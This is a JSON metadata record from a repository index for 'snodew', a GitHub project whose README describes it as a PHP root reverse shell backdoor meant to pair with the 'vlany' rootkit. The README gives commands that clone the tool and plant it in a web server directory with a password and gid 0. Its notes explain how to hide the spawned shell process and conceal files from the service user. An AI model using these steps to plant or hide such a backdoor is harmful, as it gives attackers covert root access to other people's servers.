{"id":13825796,"url":"https://github.com/mempodippy/snodew","last_synced_at":"2025-04-23T14:31:46.354Z","repository":{"id":201869396,"uuid":"77249411","full_name":"mempodippy/snodew","owner":"mempodippy","description":"PHP root (suid) reverse shell","archived":false,"fork":false,"pushed_at":"2017-06-22T22:42:42.000Z","size":7,"stargazers_count":73,"open_issues_count":0,"forks_count":22,"subscribers_count":6,"default_branch":"master","last_synced_at":"2025-04-02T16:50:33.679Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mempodippy.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2016-12-23T20:36:27.000Z","updated_at":"2025-01-08T06:38:18.000Z","dependencies_parsed_at":null,"dependency_job_id":"83ed53c3-41a7-4d05-9bc8-85fb60c75b81","html_url":"https://github.com/mempodippy/snodew","commit_stats":null,"previous_names":["mempodippy/snodew"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mempodippy%2Fsnodew","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mempodippy%2Fsnodew/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mempodippy%2Fsnodew/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mempodippy%2Fsnodew/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mempodippy","download_url":"https://codeload.github.com/mempodippy/snodew/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":250451813,"owners_count":21432906,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T09:01:27.256Z","updated_at":"2025-04-23T14:31:46.107Z","avatar_url":"https://github.com/mempodippy.png","language":"Shell","funding_links":[],"categories":["\u003ca id=\"01e6651181d405ecdcd92a452989e7e0\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"e9f97504fbd14c8bb4154bd0680e9e62\"\u003e\u003c/a\u003e反向代理"],"readme":"# snodew\n*snodew is a PHP reverse shell backdoor which uses a small suid binary to escalate privileges on connection*\u003c/br\u003e\u003c/br\u003esnodew is made mainly to work alongside [vlany](https://github.com/mempodippy/vlany) but can also be setup as a regular root backdoor\n\n## usage\n```\ngit clone https://github.com/mempodippy/snodew.git\ncd snodew/\n./setup.sh [install dir] [password] [hidden extended attribute] [magic gid]\n```\n\n### example usage for regular (non-vlany infected) systems\n```\ncd /tmp\ngit clone https://github.com/mempodippy/snodew.git\ncd snodew/\n./setup.sh /var/www/html/blog sexlovegod X 0 # 'X' and '0' since extended attribute doesn't really matter,\n                                             # and our suid binary will set our gid to 0\n```\n\u003cimg src=\"http://i.imgur.com/EA93M3g.png\"/\u003e\u003c/br\u003e\n*Result of successful setup*\n\n\u003cimg src=\"http://i.imgur.com/2MM3h45.png\"/\u003e\u003c/br\u003e\n*Result after following instructions given on our new page*\n\n## notes\n * requires a web service to be running on the box (along with php support for the service package)\n * sh process spawned from service user is visible, though this could be subverted by checking /proc/self/cmdline and hiding the process if it contains the hidden suid bin\n * if not being used alongside some kind of rootkit, everything you do is visible\n * it's only a reverse shell\n * when vlany is installed, simply su'ing to the service user won't allow them to see the files. vlany checks to see if an apache environment variable is also exported before giving access to the file, and does the same for nginx so that - by default - the file can only be accessed from a browser or from an owner shell\n  * exporting the apache environment variable that vlany checks, after su'ing to the service user will circumvent this\n * suid possibly disabled\n * not using 'exit' to exit the shell will leave the process spawned by the service in process lists (ps, top etc)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmempodippy%2Fsnodew","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmempodippy%2Fsnodew","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmempodippy%2Fsnodew/lists"}